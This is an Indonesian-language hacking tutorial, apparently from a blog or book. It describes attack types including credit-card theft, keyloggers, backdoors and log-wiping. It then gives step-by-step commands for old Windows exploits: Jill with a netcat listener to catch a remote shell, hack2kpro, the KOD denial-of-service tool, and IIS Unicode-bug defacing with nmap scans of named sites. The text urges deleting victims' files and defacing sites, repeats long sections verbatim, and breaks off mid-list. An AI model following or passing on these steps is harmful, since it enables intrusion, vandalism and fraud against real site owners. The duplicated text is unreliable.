Beberapa Jenis serangan yang dilakukan oleh seorang Hacker
# DoS: Denial of Service Attack
Adalah serangan yang dilakukan dengan cara mengirimkan paket sampah (serupa dengan
ping -s 65000). Hasil dari serangan ini adalah terhentinya layanan server (server down),
dikarenakan bandwidth penuh. Serangan ini juga mengakibatkan backbone dimana server
menginduk menjadi macet, bahkan pelayanan menjadi terhenti sama sekali.
# Defacing: jenis serangan ini, adalah dengan mengganti halaman depan suatu situs, atau
dengan mengganti isi, baik sebagian atau keseluruhan dengan halaman buatan si
penyusup.
# Spoofing: setangan ini dilakukan dengan cara pengalihan alamat IP dari suatu situs ke
alamat yang dikehendaki oleh si penyusup. Biasanya pengalihan dilakukan ke situs porno.
Model serangan jenis ini biasanya dilakukan pada situs-situs pemerintah atau institusi
lainya, sebagai bentuk protes.
# Carding: serangan ini biasanya dilakukan oleh para ‘pencuri’ kartu kredit, dengan tujuan
bisa mendapatkan nomor kartu kredit secara tidak syah. Biasanya dilakukan dengan cara:
* Database exploit: pencurian database suatu situs e-commerce, sehingga bisa
mendapatkan banyak nomor kartu kredit dengan ‘cuma-cuma’. http://www.mobiletronics.
com/
* Spoofing: pengalihat alamat suatu situs e-commerce menuju alamat situs dari carder,
sehingga terjadi transaksi ‘palsu’.
* Pembuatan situs palsu: modus ini dilakukan dengan cara membuat situs e-commerce
palsu. Sehingga pada saat terjadi ‘transaksi fiktif’, nomor kartu dan validasi dari pemilik
asli bisa didapatkan dengan mudah.
* Kerja sama orang dalam: cara ini biasa digunakan di hotel-hotel atau di restoran dan
toko-toko yang memberikan layanan kartu kredit dalam pembayaran produknya atau jasa
yang mereka berikan.
* Menggunakan keylogger: cara ini biasa terjadi di warnet atau pada layanan internet
umum lainnya. Bisa dilakukan oleh orang dalam maupun sesama pengunjung sendiri.
Dengan cara menanamkan program logger pada PC sasaran. Sehingga, bilamana terjadi
transaksi online, nomor kartu dan kata sandi (password) akan tercatat secara otomatis
pada masing-masing PC.
# Root Compromise: metode ini merupakan metode teknis penyusupan yang tertinggi
dibandingkan metode lainnya. Karena menuntut pengetahuan (skill), kesabaran dan
profesionalisme yang tinggi. Sehingga hanya bisa dilakukan oleh hacker atau cracker
profesional. Di sini, penyusup membutuhkan akses jaringan / internet 24 jam, beraneka PC
dengan sistem operasi yang berbeda, dan pengetahuan pemrograman serta keuletan yang
tinggi.
Hasil dari root compromise ini adalah, si penyusup mendapatkan akses tertinggi atas
sistem yang dikerjai. Dengan demikian, penyusup bisa melakukan apapun, termasuk di
antaranya: menyalin data penting, mengganti password sampai dengan menghancurkan
sistem.http://www.mobile-tronics.com/
Persiapan
Pada tulisan kali ini, kami akan memberikan gambaran persipan sebelum Anda melakukan
hacking suatu sistem. Anda bisa melakukan secara lokal atau dengan melalui jaringan
internet. Tentunya, jika Anda akan langsung mempraktekkan melalui jalur internet, Anda
# DoS: Denial of Service Attack
Adalah serangan yang dilakukan dengan cara mengirimkan paket sampah (serupa dengan
ping -s 65000). Hasil dari serangan ini adalah terhentinya layanan server (server down),
dikarenakan bandwidth penuh. Serangan ini juga mengakibatkan backbone dimana server
menginduk menjadi macet, bahkan pelayanan menjadi terhenti sama sekali.
# Defacing: jenis serangan ini, adalah dengan mengganti halaman depan suatu situs, atau
dengan mengganti isi, baik sebagian atau keseluruhan dengan halaman buatan si
penyusup.
# Spoofing: setangan ini dilakukan dengan cara pengalihan alamat IP dari suatu situs ke
alamat yang dikehendaki oleh si penyusup. Biasanya pengalihan dilakukan ke situs porno.
Model serangan jenis ini biasanya dilakukan pada situs-situs pemerintah atau institusi
lainya, sebagai bentuk protes.
# Carding: serangan ini biasanya dilakukan oleh para ‘pencuri’ kartu kredit, dengan tujuan
bisa mendapatkan nomor kartu kredit secara tidak syah. Biasanya dilakukan dengan cara:
* Database exploit: pencurian database suatu situs e-commerce, sehingga bisa
mendapatkan banyak nomor kartu kredit dengan ‘cuma-cuma’. http://www.mobiletronics.
com/
* Spoofing: pengalihat alamat suatu situs e-commerce menuju alamat situs dari carder,
sehingga terjadi transaksi ‘palsu’.
* Pembuatan situs palsu: modus ini dilakukan dengan cara membuat situs e-commerce
palsu. Sehingga pada saat terjadi ‘transaksi fiktif’, nomor kartu dan validasi dari pemilik
asli bisa didapatkan dengan mudah.
* Kerja sama orang dalam: cara ini biasa digunakan di hotel-hotel atau di restoran dan
toko-toko yang memberikan layanan kartu kredit dalam pembayaran produknya atau jasa
yang mereka berikan.
* Menggunakan keylogger: cara ini biasa terjadi di warnet atau pada layanan internet
umum lainnya. Bisa dilakukan oleh orang dalam maupun sesama pengunjung sendiri.
Dengan cara menanamkan program logger pada PC sasaran. Sehingga, bilamana terjadi
transaksi online, nomor kartu dan kata sandi (password) akan tercatat secara otomatis
pada masing-masing PC.
# Root Compromise: metode ini merupakan metode teknis penyusupan yang tertinggi
dibandingkan metode lainnya. Karena menuntut pengetahuan (skill), kesabaran dan
profesionalisme yang tinggi. Sehingga hanya bisa dilakukan oleh hacker atau cracker
profesional. Di sini, penyusup membutuhkan akses jaringan / internet 24 jam, beraneka PC
dengan sistem operasi yang berbeda, dan pengetahuan pemrograman serta keuletan yang
tinggi.
Hasil dari root compromise ini adalah, si penyusup mendapatkan akses tertinggi atas
sistem yang dikerjai. Dengan demikian, penyusup bisa melakukan apapun, termasuk di
antaranya: menyalin data penting, mengganti password sampai dengan menghancurkan
sistem.http://www.mobile-tronics.com/
Persiapan
Pada tulisan kali ini, kami akan memberikan gambaran persipan sebelum Anda melakukan
hacking suatu sistem. Anda bisa melakukan secara lokal atau dengan melalui jaringan
internet. Tentunya, jika Anda akan langsung mempraktekkan melalui jalur internet, Anda
juga harus bersiap juga menanggung resiko dari pihak yang berwajib :).
Sebaiknya kita mulai belajar hacking dari jaringan lokal. Di sini, kita mengacu pada sistem
operasi Linux dan Windows. Untuk sistem operasi Linux, Anda bisa menggunakan
Persiapan yang kita lakukan sebagai berikut:
PC server
* Hardware
o Processor Keluarga Pentium III - 500 atau yang lebih baik
o RAM 128 MB
o CD-ROM
* Software Untuk sistem operasi, Anda bisa menggunakan sistem operasi Windows 2000
atau Linux versi lama, seperti:
o RedHat Linux versi 9.0,
o Tawie Secure Linux 2.0
o SuSE Linux 8.0
o Mandrake Linux 9
o Slackware Linux 8
o dan Linux versi lama lainnya
PC Klien
Untuk PC klien, Anda cukup menggunakan spesifikasi yang sederhana, karena masaji-slax
hanya berjalan pada konsol, sehingga tidak membutuhkan spesifikasi mesin yang tinggi.
Minimal spesifikasi yang dibutuhkan adalah:
* Processor keluarga Pentium III - 500 Mhz
* RAM 64 MB
* CD-ROM
Selanjutnya, Anda instalasi PC server. Jangan lupa untuk menjalankan layanan (service)
berikut ini:
* Web server
* DNS server
* FTP server
* SSH server
Pada sistem operasi Windows, beberapa layanan yang perlu Anda jalankan adalah
* File Sharing
* Microsoft IIS
* Printer lokal (untuk selanjutnya di-share ke jaringan)
Pembahasan internet hacking pada buku ini dilakukan melalui sistem operasi Linux. Jadi,
jika Anda termasuk ‘pemula’ dalam menggunakan Linux. Minimal, Anda harus bisa dan
terbiasa menggunakan sintaks perintah seperti berikut ini:
* awk
* mail
* mknod
* more
* mount
* ping
* ps
* sed
* sort
* tar
* ifconfig
* ipfwadm
* last
* head
* tail
* gcc
* cut
* find
* ftp
* less
* vim
* nc (netcat)
* rcp
* xhost
* xterm
* syslogd
* inetd
* telnet
* ssh
* finger
* cat
* chmod
* dd
* grep
* gzip
* kill
* ln
* ls
Beberapa tahapan hacking yang harus dilakukan, meliputi:
1. Footprinting Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran,
mencakup pencarian informasi dengan search engine, whois, dan DNS zone transfer.
2. Scanning Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan
ping sweep dan port scan.
3. Enumeration Analisa intensif terhadap sasaran, yang mencari user account absah,
network resource and share, dan aplikasi untuk mendapatkan mana yang proteksinya
lemah.
4. Gaining Access Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses
sasaran. Meliputi mengintip dan merampas password, menebak password, serta
melakukan buffer overflow.
5. Escalating Privilege Bila baru mendapatkan user password di tahap sebelumnya, di
tahap ini diusahakan mendapat privilese admin jaringan dengan password cracking atau
exploit sejenis getadmin, sechole, atau lc_messages.
6. Pilfering Proses pengumpulan informasi dimulai lagi untuk mengidentifikasi mekanisme
untuk mendapatkan akses ke trusted sistem. Mencakup evaluasi trust dan pencarian
cleartext password di registry, config file, dan user data.
# Covering Tracks Begitu diperoleh kendali penuh terhadap sistem, maka menutup jejak
menjadi prioritas. Proses menutupi jejak meliputi, pembersihan network log dan
penggunaan hide tool seperti macam-macam rootkit dan file streaming.
# Creating Backdoors Pintu belakang diciptakan pada berbagai bagian dari sistem untuk
memudahkan masuk kembali ke sistem ini dengan cara membentuk user account palsu,
menjadwalkan batch job, mengubah startup file, menanamkan servis pengendali jarak jauh
serta monitoring tool, dan menggantikan aplikasi dengan trojan.
# Denial of Service Bila semua usaha di atas gagal, penyerang dapat melumpuhkan
sasaran sebagai usaha terakhir. Meliputi SYN flood, teknik-teknik ICMP, Supernuke,
land/latierra, teardrop, bonk, newtear, trincoo, smurf, dan lain-lain.
Sekarang, mari kita coba bersama-sama belajar internet hacking
Menyerang server Windows dengan Jill
Pada saat jill pertamakali di postingkan oleh kelompok yang menamakan dirinya Dark
Spyrit di bugtraq, jill cukup membuat bencana yang cukup besar bagi para pengguna
Windows 2000 Server. Banyak situs telah di jebol oleh para script kiddies dengan
menggunakan tools ini.
Jill melakukan exploitasi lubang keamanan pada Windows 2000 Server dengan
memanfaatkan overflow pada service printer, untuk mendapatkan akses DOS prompt
(CMD.EXE) pada komputer yang diserang tersebut.
Ada cerita menarik pada saat Jill dipublikasikan pertama kali, saat itu Microsoft selaku
vendor Windows 2000 Server tidak segera merespon keberadaan Jill ini selama hampir 2
minggu. Oleh karena itu, semua server di dunia yang terkoneksi melalui internet dengan
berbasiskan Windows 2000 Server, cukup kalangkabut dan beberapa diantara mereka
mematikan servernya selama belum ada bugfix dari Microsoft tersebut. Ini tentunya
berbeda dengan sistem opensource, dimana waktu keluarnya patch dihitung dari saat bug
muncul hanya memakan waktu beberapa hari, bahkan bisa hanya beberapa jam saja.
Berikut ini adalah tahapan dalam penggunaan program ini:
1. Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut:
[root@dir:~] # nc -l -p (nomor port kita) -vv
Misalnya, kita menggunakan port 12345 untuk menjalankan prompt, ketikkan perintah
sebagai berikut:
[root@dir:~] # nc -l -p 12345 -vv [Enter]
Tunggu sampai muncul tampilan sebagai berikut:
listening on [any] 12345 …
2. Jalankan Jill di konsole baru tersebut dengan syntax sebagai berikut :
[root@dir:~] # jill [ip_address_korban] [nomer_port_korban] [ip_address_kita]
[port_kita]
Misalnya, kita serang komputer korban (ip 192.168.0.2 dan port 80), sedangkan komputer
kita mempunyai ip 192.168.0.1 dan kita sudah membuka port nomer 12345 sebagai kanal
komunikasi Jill, maka syntax-nya sebagai berikut:
[root@dir:~] # jill 192.168.0.2 80 192.168.0.1 12345
3. Anda kembali lagi pada konsole Anda yang menjalankan nc
4. Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc
tersebut akan muncul prompt Windows 2000.
5. Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah
tampilan web atau bahkan menghapus file-file di harddisk :).
Menyerang server Windows denganhackw2k
Pihak Microsoft mengumumkan adanya hole atau celah keamanan yang menimpa salah
satu produknya, Windows 2000 Pro. Dimana hole atau celah keamanan ini memiliki
peringkat ‘high risk’, sehingga bisa mengakibatkan resiko yang fatal bagi
penggunanya.Microsoft menghimbau penggunanya untuk segera melakukan update patch.
Celah ini tidak menutup kemungkinan, juga terjadi pada produk Microsoft lainnya, seperti:
Windows ME, Windows XP, Windows 2000 dan 2003.
Berikut ini adalah tahapan dalam penggunaan program ini:
1. Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut:
[root@dir:~] # hack2kpro [alamat-ip-sasaran] [nomor-port]
Misalnya, kita menggunakan port 3003 untuk menjalankan prompt, ketikkan perintah
sebagai berikut:
[root@dir:~] # hack2kpro 192.168.0.1 3003
Tunggu sampai muncul tampilan sebagai berikut:
#
Kemudian, tekan [Ctrl+C]
# Lanjutkan dengan mengetikkan sintaks perintah netcat berikut ini:
[root@dir:~] # nc 192.168.0.1 300
Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut
akan muncul prompt Windows 2000.
Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah
tampilan web atau bahkan menghapus file-file di harddisk yang bersangkutan :).
Menyerang server Windows dengan KOD
KOD atau kepanjangan dari Kiss Of Death adalah semacam tool yang digunakan untuk
menyerang Windows pada port default 139. Fungsi dari kod adalah membuat komputer
terget menjadi ” hang /blue screen”. Kod sendiri ada suatu file mentah dalam bentuk
bahasa C. Pada pembahasan ini kami akan menerangkan bagaimana caranya kita akan
men-compile kod lalu bagai mana cara menjalankannya dan yang terakhir bagaimana hasil
dari kod.
1. Pertama kali yang harus kita lakukan adalah melakukan download file kod.c. Anda dapat
mencarinya di search engine atau di ftp.technotronic.com.
2. Setelah Anda download, yang harus Anda lakukan selanjutnya adalah
mengkompilasinya, sebelumnya kod.c hanya berjalan di komputer dengan sistem operasi
Unix/Linux. Selanjutnya Anda bisa mengompilasi file kod.c sebagai berikut :
[root@dir:~] # gcc -o kod kod.c
Untuk lebih mudahnya, kami sudah menyertakan file kod dalam bentuk jadi pada masajislax.
Cara penggunaannya cukup mudah, Anda tinggal ketikkan:
[root@dir:~] # kod [no_ip] -p [nomor port] -t [hits]
Pertama kita cari dulu targetnya setelah ditemukan kita scan port dulu karena kita harus
tahu port apa saja yang dijalankan oleh target kita selanjutnya jika sudah diketahui maka
kita bisa mencobanya. Sebagai contoh kita ambil port 139 yaitu merupakan port dari
service yang dijalankan oleh Windows9.x namanya netbios-ssn. Dampak serangan bagi
port ini adalah menghambat atau mencegat semua packet yang akan keluar atau masuk
dan dalam hal ini jika komputer target sedang dalam kondisi online maka komputer
tersebut tidak dapat browsing/surfing. Cara untuk mengatasi serangan ini jika sudah terjadi
adalah restart komputer.
1. Komputer target terhubung dengan internet dan komputer tersebut tidak memiliki
jaringan LAN dan system yang dijalankan Windows9x/ME di sini kita mungkin bisa berhasil.
2. Komputer terget memiliki sebuah server, dan client menggunakan Windows9x/ME disini
kemungkinan berhasilnya fifty-fifty karena packet serangan kita terkadang difilter oleh
server.
3. Komputer target memiliki server yang memiliki firewall dan client menjalankan
Windows9x/NT/ME disini ada kemungkinan berhasil sangat kecil sekali karena sangat
banyak kemungkinannya diantaranya adalah client menggunakan WinNT dan sudah di
patch atau diberi security maka sangat susah sekali ditembus kedua Windows9x ada
kemungkinan berhasil jika firewall di server tidak memblokir port 139 tadi.
Kod sebenarnya disebabkan oleh Proses dari proses igmp packet untuk Window tidak
tertulis secara benar. Kod membuat Blue Screen pada Windows 98/98 SE dan membunuh
TCP stack. Ketika pengguna komputer menggunakan komputer yang telah diserang oleh
kod ini dia tetap bisa melakukan aktivitasnya tetapi tidak ada lagi TCP stack. Packet yang
ditulis oleh user akan dikirimkan tetapi tidak akan menerima jawaban. Contoh untuk situasi
seperti ini adalah jika Anda melakukan perintah ping terhadap suatu address maka icmp
echo request akan di kirimkan tetapi icmp echo replies tidak akan mengirimkan jawaban
kembali. Solusi untuk para pengguna komputer yang menggunakan modem sebagai alat
koneksi ke internet adalah memutuskan hubungan internet dan menyambungkan/connect
kembali. Dan untuk pengguna komputer yang posisi jaringan komputernya adalah melalui
LAN maka komputer tersebut harus direstart.
Mengubah Tampilan Web (Defacing) Secara Illegal pada server Windows
Pada bagian ini kita akan berbagi pengalaman bagaimana cara melakukan defacing web
server yang menggunakan Microsoft Internet Information Server atau lebih kita kenal
dengan nama Microsoft IIS
Pada Microsoft Internet Information Server Atau Microsoft IIS 5.0 memiliki suatu bug yang
dinamakan “UnicodeBug”. Bug tersebut dapat mengexplorasi komputer / situs hanya
melalui web browser saja.
Sebelum melakukan defacing, perlu kita persiapkan beberapa hal sebagai berikut:
1. Menentukan target atau sasaran untuk defacing.
2. Web/internet browser yang kita gunakan untuk mengakses situs tujuan. Misalnya:
FireFox, Netscape Navigator dan lain - lain.
3. Mencari server yang menggunakan Microsoft IIS. Anda bisa melakukan pemeriksaan,
apakah server tujuan menggunakan sistem operasi Windows atau bukan di situs
http://www.netcraft.com
Selain hal diatas yang perlu kita perhatikan adalah, kita harus memastikan situs yang akan
kita ubah tampilannya (deface),menjalankan Microsoft IIS yang masih belum di patch pada
Unicodenya
Sekarang kita memasuki tahap untuk melakukan deface. Sebelumnya ada beberapa tool
yang sangat mendukung dalam usaha defacing kita. Sebenarnya ada bermacam-macam
tool yang biasa digunakan tetapi untuk saat ini kami akan memberikan beberapa tool saja
yang sekiranya sudah cukup untuk proses deface. Tool-tool tersebut diantaranya adalah :
1. tftpd32.exe Tool ini digunakan untuk melakukan Upload index.html atau halaman depan
yang telah kita siapkan yang nantinya akan kita taruh dihalaman depan situs tersebut.
2. ncx99.exe Tool ini digunakan untuk mengambil file index.html atau halaman depan dari
situs yang telah berhasil kita deface
3. Unitools.tgz Tool ini digunakan untuk untuk melakukan tes, apakah situs sasaran bisa
atau tidak untuk defacing. Program ini hanya berjalan di Linux/Unix
Adapun langkah-langkah dalam melakukan defacing web adalah sebagai berikut:
1. Pastikan server situs sasaran menggunakan sistem operasi MS Windows dan
menjalankan Microsoft IIS 5.0. Untuk mengentahuinya, Anda bisa cari di
http://www.netcraft.com.
Berikut ini adalah contoh situs yang menggunakan sistem operasi Windows 2003 Server
# Selanjutnya, kita pastikan sasaran kita, dengan melakukan pemindaian sasaran. Tujuan
dari pemindaian ini adalah, kita bisa emngetahui celah-celah yang terbuka dan
memungkinkan bagi kita untuk melakukan serangan. Pemindaian ini kita lakukan dengan
menggunakan program nmap. Contohnya adalah sebagai berikut:
[root@dir:~] # nmap -P0 -sT -v -O www.nama_sasaran.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 03:55 GMT
Initiating Connect() Scan against www.nama_sasaran.com (192.168.0. [1668
ports] at 03:55
Discovered open port 80/tcp on 192.168.0.8
Connect() Scan Timing: About 45.92% done; ETC: 03:56 (0:00:35 remaining)
The Connect() Scan took 77.65s to scan 1668 total ports.
Warning: OS detection will be MUCH less reliable because we did not find at
least 1 open and 1 closed TCP port
For OSScan assuming port 80 is open, 33786 is closed, and neither are firewalled
Host www.gramedia.com (192.168.0. appears to be up … good.
Interesting ports on www.gramedia.com (192.168.0.8):
(The 1667 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
80/tcp open http
Device type: general purpose
Running: IBM AIX 4.X, Microsoft Windows 2003/.NET|NT/2K/XP
OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows 2003
Server or XP SP2, Microsoft Windows XP Home Edition (English) SP2, Microsoft
Windows XP Pro SP2, Microsoft Windows XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental
Nmap finished: 1 IP address (1 host up) scanned in 81.771 seconds
Raw packets sent: 21 (1796B) | Rcvd: 7 (420B)
[root@dir:~] #
Contoh di atas adalah salah satu target sasaran yang cukup tangguh sistem keamanannya.
Berikut ini, kita akan lakukan pemindaian sekali lagi dengan sasaran yang agak lemah.
Seperti ditunjukkan pada contoh berikut ini:
[root@dir:~] # nmap -P0 -sT -v -O www.sasaran2.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 04:04 GMT
Initiating Connect() Scan against 64.62.165.135 [1668 ports] at 04:04
Discovered open port 3389/tcp on 64.62.165.135
Discovered open port 443/tcp on 64.62.165.135
Discovered open port 25/tcp on 64.62.165.135
Discovered open port 80/tcp on 64.62.165.135
Discovered open port 21/tcp on 64.62.165.135
Discovered open port 1248/tcp on 64.62.165.135
Discovered open port 1025/tcp on 64.62.165.135
Connect() Scan Timing: About 48.89% done; ETC: 04:05 (0:00:31 remaining)
Discovered open port 1026/tcp on 64.62.165.135
Increasing send delay for 64.62.165.135 from 0 to 5 due to max_successful_tryno
increase to 4
Discovered open port 2067/tcp on 64.62.165.135
The Connect() Scan took 88.85s to scan 1668 total ports.
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host 64.62.165.135 appears to be up … good.
Interesting ports on 64.62.165.135:
(The 1637 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
130/tcp filtered cisco-fna
131/tcp filtered cisco-tna
132/tcp filtered cisco-sys
133/tcp filtered statsrv
134/tcp filtered ingres-net
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
140/tcp filtered emfis-data
#
200/tcp filtered src
443/tcp open https
444/tcp filtered snpp
bersambung nanti lagi yaaa
Sebaiknya kita mulai belajar hacking dari jaringan lokal. Di sini, kita mengacu pada sistem
operasi Linux dan Windows. Untuk sistem operasi Linux, Anda bisa menggunakan
Persiapan yang kita lakukan sebagai berikut:
PC server
* Hardware
o Processor Keluarga Pentium III - 500 atau yang lebih baik
o RAM 128 MB
o CD-ROM
* Software Untuk sistem operasi, Anda bisa menggunakan sistem operasi Windows 2000
atau Linux versi lama, seperti:
o RedHat Linux versi 9.0,
o Tawie Secure Linux 2.0
o SuSE Linux 8.0
o Mandrake Linux 9
o Slackware Linux 8
o dan Linux versi lama lainnya
PC Klien
Untuk PC klien, Anda cukup menggunakan spesifikasi yang sederhana, karena masaji-slax
hanya berjalan pada konsol, sehingga tidak membutuhkan spesifikasi mesin yang tinggi.
Minimal spesifikasi yang dibutuhkan adalah:
* Processor keluarga Pentium III - 500 Mhz
* RAM 64 MB
* CD-ROM
Selanjutnya, Anda instalasi PC server. Jangan lupa untuk menjalankan layanan (service)
berikut ini:
* Web server
* DNS server
* FTP server
* SSH server
Pada sistem operasi Windows, beberapa layanan yang perlu Anda jalankan adalah
* File Sharing
* Microsoft IIS
* Printer lokal (untuk selanjutnya di-share ke jaringan)
Pembahasan internet hacking pada buku ini dilakukan melalui sistem operasi Linux. Jadi,
jika Anda termasuk ‘pemula’ dalam menggunakan Linux. Minimal, Anda harus bisa dan
terbiasa menggunakan sintaks perintah seperti berikut ini:
* awk
* mknod
* more
* mount
* ping
* ps
* sed
* sort
* tar
* ifconfig
* ipfwadm
* last
* head
* tail
* gcc
* cut
* find
* ftp
* less
* vim
* nc (netcat)
* rcp
* xhost
* xterm
* syslogd
* inetd
* telnet
* ssh
* finger
* cat
* chmod
* dd
* grep
* gzip
* kill
* ln
* ls
Beberapa tahapan hacking yang harus dilakukan, meliputi:
1. Footprinting Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran,
mencakup pencarian informasi dengan search engine, whois, dan DNS zone transfer.
2. Scanning Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan
ping sweep dan port scan.
3. Enumeration Analisa intensif terhadap sasaran, yang mencari user account absah,
network resource and share, dan aplikasi untuk mendapatkan mana yang proteksinya
lemah.
4. Gaining Access Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses
sasaran. Meliputi mengintip dan merampas password, menebak password, serta
melakukan buffer overflow.
5. Escalating Privilege Bila baru mendapatkan user password di tahap sebelumnya, di
tahap ini diusahakan mendapat privilese admin jaringan dengan password cracking atau
exploit sejenis getadmin, sechole, atau lc_messages.
6. Pilfering Proses pengumpulan informasi dimulai lagi untuk mengidentifikasi mekanisme
untuk mendapatkan akses ke trusted sistem. Mencakup evaluasi trust dan pencarian
cleartext password di registry, config file, dan user data.
# Covering Tracks Begitu diperoleh kendali penuh terhadap sistem, maka menutup jejak
menjadi prioritas. Proses menutupi jejak meliputi, pembersihan network log dan
penggunaan hide tool seperti macam-macam rootkit dan file streaming.
# Creating Backdoors Pintu belakang diciptakan pada berbagai bagian dari sistem untuk
memudahkan masuk kembali ke sistem ini dengan cara membentuk user account palsu,
menjadwalkan batch job, mengubah startup file, menanamkan servis pengendali jarak jauh
serta monitoring tool, dan menggantikan aplikasi dengan trojan.
# Denial of Service Bila semua usaha di atas gagal, penyerang dapat melumpuhkan
sasaran sebagai usaha terakhir. Meliputi SYN flood, teknik-teknik ICMP, Supernuke,
land/latierra, teardrop, bonk, newtear, trincoo, smurf, dan lain-lain.
Sekarang, mari kita coba bersama-sama belajar internet hacking
Menyerang server Windows dengan Jill
Pada saat jill pertamakali di postingkan oleh kelompok yang menamakan dirinya Dark
Spyrit di bugtraq, jill cukup membuat bencana yang cukup besar bagi para pengguna
Windows 2000 Server. Banyak situs telah di jebol oleh para script kiddies dengan
menggunakan tools ini.
Jill melakukan exploitasi lubang keamanan pada Windows 2000 Server dengan
memanfaatkan overflow pada service printer, untuk mendapatkan akses DOS prompt
(CMD.EXE) pada komputer yang diserang tersebut.
Ada cerita menarik pada saat Jill dipublikasikan pertama kali, saat itu Microsoft selaku
vendor Windows 2000 Server tidak segera merespon keberadaan Jill ini selama hampir 2
minggu. Oleh karena itu, semua server di dunia yang terkoneksi melalui internet dengan
berbasiskan Windows 2000 Server, cukup kalangkabut dan beberapa diantara mereka
mematikan servernya selama belum ada bugfix dari Microsoft tersebut. Ini tentunya
berbeda dengan sistem opensource, dimana waktu keluarnya patch dihitung dari saat bug
muncul hanya memakan waktu beberapa hari, bahkan bisa hanya beberapa jam saja.
Berikut ini adalah tahapan dalam penggunaan program ini:
1. Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut:
[root@dir:~] # nc -l -p (nomor port kita) -vv
Misalnya, kita menggunakan port 12345 untuk menjalankan prompt, ketikkan perintah
sebagai berikut:
[root@dir:~] # nc -l -p 12345 -vv [Enter]
Tunggu sampai muncul tampilan sebagai berikut:
listening on [any] 12345 …
2. Jalankan Jill di konsole baru tersebut dengan syntax sebagai berikut :
[root@dir:~] # jill [ip_address_korban] [nomer_port_korban] [ip_address_kita]
[port_kita]
Misalnya, kita serang komputer korban (ip 192.168.0.2 dan port 80), sedangkan komputer
kita mempunyai ip 192.168.0.1 dan kita sudah membuka port nomer 12345 sebagai kanal
komunikasi Jill, maka syntax-nya sebagai berikut:
[root@dir:~] # jill 192.168.0.2 80 192.168.0.1 12345
3. Anda kembali lagi pada konsole Anda yang menjalankan nc
4. Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc
tersebut akan muncul prompt Windows 2000.
5. Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah
tampilan web atau bahkan menghapus file-file di harddisk :).
Menyerang server Windows denganhackw2k
Pihak Microsoft mengumumkan adanya hole atau celah keamanan yang menimpa salah
satu produknya, Windows 2000 Pro. Dimana hole atau celah keamanan ini memiliki
peringkat ‘high risk’, sehingga bisa mengakibatkan resiko yang fatal bagi
penggunanya.Microsoft menghimbau penggunanya untuk segera melakukan update patch.
Celah ini tidak menutup kemungkinan, juga terjadi pada produk Microsoft lainnya, seperti:
Windows ME, Windows XP, Windows 2000 dan 2003.
Berikut ini adalah tahapan dalam penggunaan program ini:
1. Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut:
[root@dir:~] # hack2kpro [alamat-ip-sasaran] [nomor-port]
Misalnya, kita menggunakan port 3003 untuk menjalankan prompt, ketikkan perintah
sebagai berikut:
[root@dir:~] # hack2kpro 192.168.0.1 3003
Tunggu sampai muncul tampilan sebagai berikut:
#
Kemudian, tekan [Ctrl+C]
# Lanjutkan dengan mengetikkan sintaks perintah netcat berikut ini:
[root@dir:~] # nc 192.168.0.1 300
Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut
akan muncul prompt Windows 2000.
Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah
tampilan web atau bahkan menghapus file-file di harddisk yang bersangkutan :).
Menyerang server Windows dengan KOD
KOD atau kepanjangan dari Kiss Of Death adalah semacam tool yang digunakan untuk
menyerang Windows pada port default 139. Fungsi dari kod adalah membuat komputer
terget menjadi ” hang /blue screen”. Kod sendiri ada suatu file mentah dalam bentuk
bahasa C. Pada pembahasan ini kami akan menerangkan bagaimana caranya kita akan
men-compile kod lalu bagai mana cara menjalankannya dan yang terakhir bagaimana hasil
dari kod.
1. Pertama kali yang harus kita lakukan adalah melakukan download file kod.c. Anda dapat
mencarinya di search engine atau di ftp.technotronic.com.
2. Setelah Anda download, yang harus Anda lakukan selanjutnya adalah
mengkompilasinya, sebelumnya kod.c hanya berjalan di komputer dengan sistem operasi
Unix/Linux. Selanjutnya Anda bisa mengompilasi file kod.c sebagai berikut :
[root@dir:~] # gcc -o kod kod.c
Untuk lebih mudahnya, kami sudah menyertakan file kod dalam bentuk jadi pada masajislax.
Cara penggunaannya cukup mudah, Anda tinggal ketikkan:
[root@dir:~] # kod [no_ip] -p [nomor port] -t [hits]
Pertama kita cari dulu targetnya setelah ditemukan kita scan port dulu karena kita harus
tahu port apa saja yang dijalankan oleh target kita selanjutnya jika sudah diketahui maka
kita bisa mencobanya. Sebagai contoh kita ambil port 139 yaitu merupakan port dari
service yang dijalankan oleh Windows9.x namanya netbios-ssn. Dampak serangan bagi
port ini adalah menghambat atau mencegat semua packet yang akan keluar atau masuk
dan dalam hal ini jika komputer target sedang dalam kondisi online maka komputer
tersebut tidak dapat browsing/surfing. Cara untuk mengatasi serangan ini jika sudah terjadi
adalah restart komputer.
1. Komputer target terhubung dengan internet dan komputer tersebut tidak memiliki
jaringan LAN dan system yang dijalankan Windows9x/ME di sini kita mungkin bisa berhasil.
2. Komputer terget memiliki sebuah server, dan client menggunakan Windows9x/ME disini
